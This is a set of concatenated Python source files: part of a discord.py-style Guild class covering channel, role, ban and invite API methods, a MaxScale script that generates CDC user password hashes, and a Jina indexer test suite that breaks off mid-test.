This is similar to :meth:`create_text_channel` except makes a :class:`StageChannel` instead.
.. note::
The ``slowmode_delay`` and ``nsfw`` parameters are not supported in this function.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`StageChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.stage_voice, category, reason=reason, position=position, topic=topic)
channel = StageChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_category(self, name, *, overwrites=None, reason=None, position=None):
"""|coro|
Same as :meth:`create_text_channel` except makes a :class:`CategoryChannel` instead.
.. note::
The ``category`` parameter is not supported in this function since categories
cannot have categories.
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`CategoryChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.category, reason=reason, position=position)
channel = CategoryChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
create_category_channel = create_category
async def leave(self):
"""|coro|
Leaves the guild.
.. note::
You cannot leave the guild that you own, you must delete it instead
via :meth:`delete`.
Raises
--------
HTTPException
Leaving the guild failed.
"""
await self._state.http.leave_guild(self.id)
async def delete(self):
"""|coro|
Deletes the guild. You must be the guild owner to delete the
guild.
Raises
--------
HTTPException
Deleting the guild failed.
Forbidden
You do not have permissions to delete the guild.
"""
await self._state.http.delete_guild(self.id)
async def edit(self, *, reason=None, **fields):
"""|coro|
Edits the guild.
You must have the :attr:`~Permissions.manage_guild` permission
to edit the guild.
.. versionchanged:: 1.4
The `rules_channel` and `public_updates_channel` keyword-only parameters were added.
Parameters
----------
name: :class:`str`
The new name of the guild.
description: :class:`str`
The new description of the guild. This is only available to guilds that
contain ``PUBLIC`` in :attr:`Guild.features`.
icon: :class:`bytes`
A :term:`py:bytes-like object` representing the icon. Only PNG/JPEG supported
and GIF This is only available to guilds that contain ``ANIMATED_ICON`` in :attr:`Guild.features`.
Could be ``None`` to denote removal of the icon.
banner: :class:`bytes`
A :term:`py:bytes-like object` representing the banner.
Could be ``None`` to denote removal of the banner.
splash: :class:`bytes`
A :term:`py:bytes-like object` representing the invite splash.
Only PNG/JPEG supported. Could be ``None`` to denote removing the
splash. This is only available to guilds that contain ``INVITE_SPLASH``
in :attr:`Guild.features`.
region: :class:`VoiceRegion`
The new region for the guild's voice communication.
afk_channel: Optional[:class:`VoiceChannel`]
The new channel that is the AFK channel. Could be ``None`` for no AFK channel.
afk_timeout: :class:`int`
The number of seconds until someone is moved to the AFK channel.
owner: :class:`Member`
The new owner of the guild to transfer ownership to. Note that you must
be owner of the guild to do this.
verification_level: :class:`VerificationLevel`
The new verification level for the guild.
default_notifications: :class:`NotificationLevel`
The new default notification level for the guild.
explicit_content_filter: :class:`ContentFilter`
The new explicit content filter for the guild.
vanity_code: :class:`str`
The new vanity code for the guild.
system_channel: Optional[:class:`TextChannel`]
The new channel that is used for the system channel. Could be ``None`` for no system channel.
system_channel_flags: :class:`SystemChannelFlags`
The new system channel settings to use with the new system channel.
preferred_locale: :class:`str`
The new preferred locale for the guild. Used as the primary language in the guild.
If set, this must be an ISO 639 code, e.g. ``en-US`` or ``ja`` or ``zh-CN``.
rules_channel: Optional[:class:`TextChannel`]
The new channel that is used for rules. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no rules
channel.
public_updates_channel: Optional[:class:`TextChannel`]
The new channel that is used for public updates from Discord. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no
public updates channel.
reason: Optional[:class:`str`]
The reason for editing this guild. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to edit the guild.
HTTPException
Editing the guild failed.
InvalidArgument
The image format passed in to ``icon`` is invalid. It must be
PNG or JPG. This is also raised if you are not the owner of the
guild and request an ownership transfer.
"""
http = self._state.http
try:
icon_bytes = fields['icon']
except KeyError:
icon = self.icon
else:
if icon_bytes is not None:
icon = utils._bytes_to_base64_data(icon_bytes)
else:
icon = None
try:
banner_bytes = fields['banner']
except KeyError:
banner = self.banner
else:
if banner_bytes is not None:
banner = utils._bytes_to_base64_data(banner_bytes)
else:
banner = None
try:
vanity_code = fields['vanity_code']
except KeyError:
pass
else:
await http.change_vanity_code(self.id, vanity_code, reason=reason)
try:
splash_bytes = fields['splash']
except KeyError:
splash = self.splash
else:
if splash_bytes is not None:
splash = utils._bytes_to_base64_data(splash_bytes)
else:
splash = None
fields['icon'] = icon
fields['banner'] = banner
fields['splash'] = splash
default_message_notifications = fields.get('default_notifications', self.default_notifications)
if not isinstance(default_message_notifications, NotificationLevel):
raise InvalidArgument('default_notifications field must be of type NotificationLevel')
fields['default_message_notifications'] = default_message_notifications.value
try:
afk_channel = fields.pop('afk_channel')
except KeyError:
pass
else:
if afk_channel is None:
fields['afk_channel_id'] = afk_channel
else:
fields['afk_channel_id'] = afk_channel.id
try:
system_channel = fields.pop('system_channel')
except KeyError:
pass
else:
if system_channel is None:
fields['system_channel_id'] = system_channel
else:
fields['system_channel_id'] = system_channel.id
if 'owner' in fields:
if self.owner_id != self._state.self_id:
raise InvalidArgument('To transfer ownership you must be the owner of the guild.')
fields['owner_id'] = fields['owner'].id
if 'region' in fields:
fields['region'] = str(fields['region'])
level = fields.get('verification_level', self.verification_level)
if not isinstance(level, VerificationLevel):
raise InvalidArgument('verification_level field must be of type VerificationLevel')
fields['verification_level'] = level.value
explicit_content_filter = fields.get('explicit_content_filter', self.explicit_content_filter)
if not isinstance(explicit_content_filter, ContentFilter):
raise InvalidArgument('explicit_content_filter field must be of type ContentFilter')
fields['explicit_content_filter'] = explicit_content_filter.value
system_channel_flags = fields.get('system_channel_flags', self.system_channel_flags)
if not isinstance(system_channel_flags, SystemChannelFlags):
raise InvalidArgument('system_channel_flags field must be of type SystemChannelFlags')
fields['system_channel_flags'] = system_channel_flags.value
try:
rules_channel = fields.pop('rules_channel')
except KeyError:
pass
else:
if rules_channel is None:
fields['rules_channel_id'] = rules_channel
else:
fields['rules_channel_id'] = rules_channel.id
try:
public_updates_channel = fields.pop('public_updates_channel')
except KeyError:
pass
else:
if public_updates_channel is None:
fields['public_updates_channel_id'] = public_updates_channel
else:
fields['public_updates_channel_id'] = public_updates_channel.id
await http.edit_guild(self.id, reason=reason, **fields)
async def fetch_channels(self):
"""|coro|
Retrieves all :class:`abc.GuildChannel` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`channels` instead.
.. versionadded:: 1.2
Raises
-------
InvalidData
An unknown channel type was received from Discord.
HTTPException
Retrieving the channels failed.
Returns
-------
List[:class:`abc.GuildChannel`]
All channels in the guild.
"""
data = await self._state.http.get_all_guild_channels(self.id)
def convert(d):
factory, ch_type = _channel_factory(d['type'])
if factory is None:
raise InvalidData('Unknown channel type {type} for channel ID {id}.'.format_map(data))
channel = factory(guild=self, state=self._state, data=d)
return channel
return [convert(d) for d in data]
def fetch_members(self, *, limit=1000, after=None):
"""Retrieves an :class:`.AsyncIterator` that enables receiving the guild's members. In order to use this,
:meth:`Intents.members` must be enabled.
.. note::
This method is an API call. For general usage, consider :attr:`members` instead.
.. versionadded:: 1.3
All parameters are optional.
Parameters
----------
limit: Optional[:class:`int`]
The number of members to retrieve. Defaults to 1000.
Pass ``None`` to fetch all members. Note that this is potentially slow.
after: Optional[Union[:class:`.abc.Snowflake`, :class:`datetime.datetime`]]
Retrieve members after this date or object.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
Raises
------
ClientException
The members intent is not enabled.
HTTPException
Getting the members failed.
Yields
------
:class:`.Member`
The member with the member data parsed.
Examples
--------
Usage ::
async for member in guild.fetch_members(limit=150):
print(member.name)
Flattening into a list ::
members = await guild.fetch_members(limit=150).flatten()
# members is now a list of Member...
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return MemberIterator(self, limit=limit, after=after)
async def fetch_member(self, member_id):
"""|coro|
Retrieves a :class:`Member` from a guild ID, and a member ID.
.. note::
This method is an API call. For general usage, consider :meth:`get_member` instead.
Parameters
-----------
member_id: :class:`int`
The member's ID to fetch from.
Raises
-------
Forbidden
You do not have access to the guild.
HTTPException
Fetching the member failed.
Returns
--------
:class:`Member`
The member from the member ID.
"""
data = await self._state.http.get_member(self.id, member_id)
return Member(data=data, state=self._state, guild=self)
async def fetch_ban(self, user):
"""|coro|
Retrieves the :class:`BanEntry` for a user.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to get ban information from.
Raises
------
Forbidden
You do not have proper permissions to get the information.
NotFound
This user is not banned.
HTTPException
An error occurred while fetching the information.
Returns
-------
:class:`BanEntry`
The :class:`BanEntry` object for the specified user.
"""
data: BanPayload = await self._state.http.get_ban(user.id, self.id)
return BanEntry(
user=User(state=self._state, data=data['user']),
reason=data['reason']
)
async def bans(self):
"""|coro|
Retrieves all the users that are banned from the guild as a :class:`list` of :class:`BanEntry`.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
--------
List[:class:`BanEntry`]
A list of :class:`BanEntry` objects.
"""
data: List[BanPayload] = await self._state.http.get_bans(self.id)
return [BanEntry(user=User(state=self._state, data=e['user']),
reason=e['reason'])
for e in data]
async def prune_members(self, *, days, compute_prune_count=True, roles=None, reason=None):
r"""|coro|
Prunes the guild from its inactive members.
The inactive members are denoted if they have not logged on in
``days`` number of days and they have no roles.
You must have the :attr:`~Permissions.kick_members` permission
to use this.
To check how many members you would prune without actually pruning,
see the :meth:`estimate_pruned_members` function.
To prune members that have specific roles see the ``roles`` parameter.
.. versionchanged:: 1.4
The ``roles`` keyword-only parameter was added.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
compute_prune_count: :class:`bool`
Whether to compute the prune count. This defaults to ``True``
which makes it prone to timeouts in very large guilds. In order
to prevent timeouts, you must set this to ``False``. If this is
set to ``False``\, then this function will always return ``None``.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the pruning process. If a member
has a role that is not specified, they'll be excluded.
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while pruning members.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
Optional[:class:`int`]
The number of members pruned. If ``compute_prune_count`` is ``False``
then this returns ``None``.
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.prune_members(self.id, days, compute_prune_count=compute_prune_count, roles=roles, reason=reason)
return data['pruned']
async def templates(self):
"""|coro|
Gets the list of templates from this guild.
Requires :attr:`~.Permissions.manage_guild` permissions.
.. versionadded:: 1.7
Raises
-------
Forbidden
You don't have permissions to get the templates.
Returns
--------
List[:class:`Template`]
The templates for this guild.
"""
from .template import Template
data = await self._state.http.guild_templates(self.id)
return [Template(data=d, state=self._state) for d in data]
async def webhooks(self):
"""|coro|
Gets the list of webhooks from this guild.
Requires :attr:`~.Permissions.manage_webhooks` permissions.
Raises
-------
Forbidden
You don't have permissions to get the webhooks.
Returns
--------
List[:class:`Webhook`]
The webhooks for this guild.
"""
from .webhook import Webhook
data = await self._state.http.guild_webhooks(self.id)
return [Webhook.from_state(d, state=self._state) for d in data]
async def estimate_pruned_members(self, *, days, roles=None):
"""|coro|
Similar to :meth:`prune_members` except instead of actually
pruning members, it returns how many members it would prune
from the guild had it been called.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the estimate. If a member
has a role that is not specified, they'll be excluded.
.. versionadded:: 1.7
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while fetching the prune members estimate.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
:class:`int`
The number of members estimated to be pruned.
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.estimate_pruned_members(self.id, days, roles)
return data['pruned']
async def invites(self) -> List[Invite]:
"""|coro|
Returns a list of all active instant invites from the guild.
You must have the :attr:`~Permissions.manage_guild` permission to get
this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
-------
List[:class:`Invite`]
The list of invites that are currently active.
"""
data = await self._state.http.invites_from(self.id)
result = []
for invite in data:
channel = self.get_channel(int(invite['channel']['id']))
invite['channel'] = channel
invite['guild'] = self
result.append(Invite(state=self._state, data=invite))
return result
async def create_template(self, *, name, description=None):
"""|coro|
Creates a template for the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.7
Parameters
-----------
name: :class:`str`
The name of the template.
description: Optional[:class:`str`]
The description of the template.
"""
from .template import Template
payload = {
'name': name
}
if description:
payload['description'] = description
data = await self._state.http.create_template(self.id, payload)
return Template(state=self._state, data=data)
async def create_integration(self, *, type, id):
"""|coro|
Attaches an integration to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Parameters
-----------
type: :class:`str`
The integration type (e.g. Twitch).
id: :class:`int`
The integration ID.
Raises
-------
Forbidden
You do not have permission to create the integration.
HTTPException
The account could not be found.
"""
await self._state.http.create_integration(self.id, type, id)
async def integrations(self):
"""|coro|
Returns a list of all integrations attached to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permission to create the integration.
HTTPException
Fetching the integrations failed.
Returns
--------
List[:class:`Integration`]
The list of integrations that are attached to the guild.
"""
data = await self._state.http.get_all_integrations(self.id)
return [Integration(guild=self, data=d) for d in data]
async def fetch_emojis(self):
r"""|coro|
Retrieves all custom :class:`Emoji`\s from the guild.
.. note::
This method is an API call. For general usage, consider :attr:`emojis` instead.
Raises
---------
HTTPException
An error occurred fetching the emojis.
Returns
--------
List[:class:`Emoji`]
The retrieved emojis.
"""
data = await self._state.http.get_all_custom_emojis(self.id)
return [Emoji(guild=self, state=self._state, data=d) for d in data]
async def fetch_emoji(self, emoji_id):
"""|coro|
Retrieves a custom :class:`Emoji` from the guild.
.. note::
This method is an API call.
For general usage, consider iterating over :attr:`emojis` instead.
Parameters
-------------
emoji_id: :class:`int`
The emoji's ID.
Raises
---------
NotFound
The emoji requested could not be found.
HTTPException
An error occurred fetching the emoji.
Returns
--------
:class:`Emoji`
The retrieved emoji.
"""
data = await self._state.http.get_custom_emoji(self.id, emoji_id)
return Emoji(guild=self, state=self._state, data=data)
async def create_custom_emoji(self, *, name, image, roles=None, reason=None):
r"""|coro|
Creates a custom :class:`Emoji` for the guild.
There is currently a limit of 50 static and animated emojis respectively per guild,
unless the guild has the ``MORE_EMOJI`` feature which extends the limit to 200.
You must have the :attr:`~Permissions.manage_emojis` permission to
do this.
Parameters
-----------
name: :class:`str`
The emoji name. Must be at least 2 characters.
image: :class:`bytes`
The :term:`py:bytes-like object` representing the image data to use.
Only JPG, PNG and GIF images are supported.
roles: Optional[List[:class:`Role`]]
A :class:`list` of :class:`Role`\s that can use this emoji. Leave empty to make it available to everyone.
reason: Optional[:class:`str`]
The reason for creating this emoji. Shows up on the audit log.
Raises
-------
Forbidden
You are not allowed to create emojis.
HTTPException
An error occurred creating an emoji.
Returns
--------
:class:`Emoji`
The created emoji.
"""
img = utils._bytes_to_base64_data(image)
if roles:
roles = [role.id for role in roles]
data = await self._state.http.create_custom_emoji(self.id, name, img, roles=roles, reason=reason)
return self._state.store_emoji(self, data)
async def fetch_roles(self):
"""|coro|
Retrieves all :class:`Role` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`roles` instead.
.. versionadded:: 1.3
Raises
-------
HTTPException
Retrieving the roles failed.
Returns
-------
List[:class:`Role`]
All roles in the guild.
"""
data = await self._state.http.get_roles(self.id)
return [Role(guild=self, state=self._state, data=d) for d in data]
async def create_role(self, *, reason=None, **fields):
"""|coro|
Creates a :class:`Role` for the guild.
All fields are optional.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionchanged:: 1.6
Can now pass ``int`` to ``colour`` keyword-only parameter.
Parameters
-----------
name: :class:`str`
The role name. Defaults to 'new role'.
permissions: :class:`Permissions`
The permissions to have. Defaults to no permissions.
colour: Union[:class:`Colour`, :class:`int`]
The colour for the role. Defaults to :meth:`Colour.default`.
This is aliased to ``color`` as well.
hoist: :class:`bool`
Indicates if the role should be shown separately in the member list.
Defaults to ``False``.
mentionable: :class:`bool`
Indicates if the role should be mentionable by others.
Defaults to ``False``.
reason: Optional[:class:`str`]
The reason for creating this role. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to create the role.
HTTPException
Creating the role failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
:class:`Role`
The newly created role.
"""
try:
perms = fields.pop('permissions')
except KeyError:
fields['permissions'] = '0'
else:
fields['permissions'] = str(perms.value)
try:
colour = fields.pop('colour')
except KeyError:
colour = fields.get('color', Colour.default())
finally:
if isinstance(colour, int):
colour = Colour(value=colour)
fields['color'] = colour.value
valid_keys = ('name', 'permissions', 'color', 'hoist', 'mentionable')
for key in fields:
if key not in valid_keys:
raise InvalidArgument(f'{key!r} is not a valid field.')
data = await self._state.http.create_role(self.id, reason=reason, **fields)
role = Role(guild=self, data=data, state=self._state)
# TODO: add to cache
return role
async def edit_role_positions(self, positions, *, reason=None):
"""|coro|
Bulk edits a list of :class:`Role` in the guild.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionadded:: 1.4
Example:
.. code-block:: python3
positions = {
bots_role: 1, # penultimate role
tester_role: 2,
admin_role: 6
}
await guild.edit_role_positions(positions=positions)
Parameters
-----------
positions
A :class:`dict` of :class:`Role` to :class:`int` to change the positions
of each given role.
reason: Optional[:class:`str`]
The reason for editing the role positions. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to move the roles.
HTTPException
Moving the roles failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
List[:class:`Role`]
A list of all the roles in the guild.
"""
if not isinstance(positions, dict):
raise InvalidArgument('positions parameter expects a dict.')
role_positions = []
for role, position in positions.items():
payload = {
'id': role.id,
'position': position
}
role_positions.append(payload)
data = await self._state.http.move_role_position(self.id, role_positions, reason=reason)
roles = []
for d in data:
role = Role(guild=self, data=d, state=self._state)
roles.append(role)
self._roles[role.id] = role
return roles
async def kick(self, user, *, reason=None):
"""|coro|
Kicks a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.kick_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to kick from their guild.
reason: Optional[:class:`str`]
The reason the user got kicked.
Raises
-------
Forbidden
You do not have the proper permissions to kick.
HTTPException
Kicking failed.
"""
await self._state.http.kick(user.id, self.id, reason=reason)
async def ban(self, user, *, reason=None, delete_message_days=1):
"""|coro|
Bans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to ban from their guild.
delete_message_days: :class:`int`
The number of days worth of messages to delete from the user
in the guild. The minimum is 0 and the maximum is 7.
reason: Optional[:class:`str`]
The reason the user got banned.
Raises
-------
Forbidden
You do not have the proper permissions to ban.
HTTPException
Banning failed.
"""
await self._state.http.ban(user.id, self.id, delete_message_days, reason=reason)
async def unban(self, user, *, reason=None):
"""|coro|
Unbans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to unban.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to unban.
HTTPException
Unbanning failed.
"""
await self._state.http.unban(user.id, self.id, reason=reason)
async def vanity_invite(self) -> Invite:
"""|coro|
Returns the guild's special vanity invite.
The guild must have ``VANITY_URL`` in :attr:`~Guild.features`.
You must have the :attr:`~Permissions.manage_guild` permission to use
this as well.
Raises
-------
Forbidden
You do not have the proper permissions to get this.
HTTPException
Retrieving the vanity invite failed.
Returns
--------
:class:`Invite`
The special vanity invite.
"""
# we start with { code: abc }
payload = await self._state.http.get_vanity_code(self.id)
# get the vanity URL channel since default channels aren't
# reliable or a thing anymore
data = await self._state.http.get_invite(payload['code'])
payload['guild'] = self
payload['channel'] = self.get_channel(int(data['channel']['id']))
payload['revoked'] = False
payload['temporary'] = False
payload['max_uses'] = 0
payload['max_age'] = 0
return Invite(state=self._state, data=payload)
def audit_logs(self, *, limit=100, before=None, after=None, oldest_first=None, user=None, action=None):
"""Returns an :class:`AsyncIterator` that enables receiving the guild's audit logs.
You must have the :attr:`~Permissions.view_audit_log` permission to use this.
Examples
----------
Getting the first 100 entries: ::
async for entry in guild.audit_logs(limit=100):
print(f'{entry.user} did {entry.action} to {entry.target}')
Getting entries for a specific action: ::
async for entry in guild.audit_logs(action=discord.AuditLogAction.ban):
print(f'{entry.user} banned {entry.target}')
Getting entries made by a specific user: ::
entries = await guild.audit_logs(limit=None, user=guild.me).flatten()
await channel.send(f'I made {len(entries)} moderation actions.')
Parameters
-----------
limit: Optional[:class:`int`]
The number of entries to retrieve. If ``None`` retrieve all entries.
before: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries before this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
after: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries after this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
oldest_first: :class:`bool`
If set to ``True``, return entries in oldest->newest order. Defaults to ``True`` if
``after`` is specified, otherwise ``False``.
user: :class:`abc.Snowflake`
The moderator to filter entries from.
action: :class:`AuditLogAction`
The action to filter with.
Raises
-------
Forbidden
You are not allowed to fetch audit logs
HTTPException
An error occurred while fetching the audit logs.
Yields
--------
:class:`AuditLogEntry`
The audit log entry.
"""
if user:
user = user.id
if action:
action = action.value
return AuditLogIterator(self, before=before, after=after, limit=limit,
oldest_first=oldest_first, user_id=user, action_type=action)
async def widget(self):
"""|coro|
Returns the widget of the guild.
.. note::
The guild must have the widget enabled to get this information.
Raises
-------
Forbidden
The widget for this guild is disabled.
HTTPException
Retrieving the widget failed.
Returns
--------
:class:`Widget`
The guild's widget.
"""
data = await self._state.http.get_widget(self.id)
return Widget(state=self._state, data=data)
async def chunk(self, *, cache=True):
"""|coro|
Requests all members that belong to this guild. In order to use this,
:meth:`Intents.members` must be enabled.
This is a websocket operation and can be slow.
.. versionadded:: 1.5
Parameters
-----------
cache: :class:`bool`
Whether to cache the members as well.
Raises
-------
ClientException
The members intent is not enabled.
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return await self._state.chunk_guild(self, cache=cache)
async def query_members(self, query=None, *, limit=5, user_ids=None, presences=False, cache=True):
"""|coro|
Request members that belong to this guild whose username starts with
the query given.
This is a websocket operation and can be slow.
.. versionadded:: 1.3
Parameters
-----------
query: Optional[:class:`str`]
The string that the username's start with.
limit: :class:`int`
The maximum number of members to send back. This must be
a number between 5 and 100.
presences: :class:`bool`
Whether to request for presences to be provided. This defaults
to ``False``.
.. versionadded:: 1.6
cache: :class:`bool`
Whether to cache the members internally. This makes operations
such as :meth:`get_member` work for those that matched.
user_ids: Optional[List[:class:`int`]]
List of user IDs to search for. If the user ID is not in the guild then it won't be returned.
.. versionadded:: 1.4
Raises
-------
asyncio.TimeoutError
The query timed out waiting for the members.
ValueError
Invalid parameters were passed to the function
ClientException
The presences intent is not enabled.
Returns
--------
List[:class:`Member`]
The list of members that have matched the query.
"""
if presences and not self._state._intents.presences:
raise ClientException('Intents.presences must be enabled to use this.')
if query is None:
if query == '':
raise ValueError('Cannot pass empty query string.')
if user_ids is None:
raise ValueError('Must pass either query or user_ids')
if user_ids is not None and query is not None:
raise ValueError('Cannot pass both query and user_ids')
if user_ids is not None and not user_ids:
raise ValueError('user_ids must contain at least 1 value')
limit = min(100, limit or 5)
return await self._state.query_members(self, query=query, limit=limit, user_ids=user_ids, presences=presences, cache=cache)
async def change_voice_state(self, *, channel, self_mute=False, self_deaf=False):
"""|coro|
Changes client's voice state in the guild.
.. versionadded:: 1.4
Parameters
-----------
channel: Optional[:class:`VoiceChannel`]
Channel the client wants to join. Use ``None`` to disconnect.
self_mute: :class:`bool`
Indicates if the client should be self-muted.
self_deaf: :class:`bool`
Indicates if the client should be self-deafened.
"""
ws = self._state._get_websocket(self.id)
channel_id = channel.id if channel else None
await ws.voice_state(self.id, channel_id, self_mute, self_deaf)
|
py | 1a38ac149da04fd45da28e9c4b8d9f037dd8f880 | #!/usr/bin/env python3
# Copyright (c) 2016 MariaDB Corporation Ab
#
# Use of this software is governed by the Business Source License included
# in the LICENSE.TXT file and at www.mariadb.com/bsl11.
#
# Change Date: 2025-05-25
#
# On the date above, in accordance with the Business Source License, use
# of this software will be governed by version 2 or later of the General
# Public License.
import sys, binascii, hashlib, argparse
parser = argparse.ArgumentParser(description = "CDC User manager", epilog = "Append the output of this program to /var/lib/maxscale/<service name>/cdcusers")
parser.add_argument("USER", help="Username")
parser.add_argument("PASSWORD", help="Password")
opts = parser.parse_args(sys.argv[1:])
print((opts.USER + ":") + hashlib.sha1(hashlib.sha1(opts.PASSWORD.encode()).digest()).hexdigest().upper())
|
py | 1a38ac2a912a3002e2a95d1112d927217fd85964 | import os
import shutil
import numpy as np
import pytest
from jina.flow import Flow
from jina import Document
from tests import validate_callback
cur_dir = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture
def uses_no_docker():
os.environ['JINA_QUERY_USES'] = 'indexer_with_ref.yml'
os.environ['JINA_QUERY_USES_INTERNAL'] = ''
os.environ['JINA_QUERY_USES_COMPOUND'] = 'compound-indexer-with-ref.yml'
os.environ['JINA_QUERY_USES_COMPOUND_INTERNAL'] = ''
yield
del os.environ['JINA_QUERY_USES']
del os.environ['JINA_QUERY_USES_COMPOUND']
del os.environ['JINA_QUERY_USES_INTERNAL']
del os.environ['JINA_QUERY_USES_COMPOUND_INTERNAL']
@pytest.fixture
def parallel(request):
os.environ['JINA_TEST_REF_INDEXER_PARALLEL'] = str(request.param)
yield
del os.environ['JINA_TEST_REF_INDEXER_PARALLEL']
@pytest.fixture
def index_docs():
docs = []
for idx in range(0, 100):
doc = Document()
doc.id = f'{idx:0>16}'
doc.embedding = doc.embedding = np.array([idx, idx])
docs.append(doc)
return docs
@pytest.fixture
def random_workspace(tmpdir):
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'] = str(tmpdir)
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'] = str(tmpdir)
yield
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER']
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY']
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer(random_workspace, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join('index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join('query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_compound(random_workspace, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'compound-index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'compound-query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.fixture
def random_workspace_move(tmpdir):
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'] = str(tmpdir) + '/index'
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'] = str(tmpdir) + '/query'
yield
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER']
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY']
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_move(random_workspace_move, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
shutil.copytree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'],
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'])
shutil.rmtree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'])
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
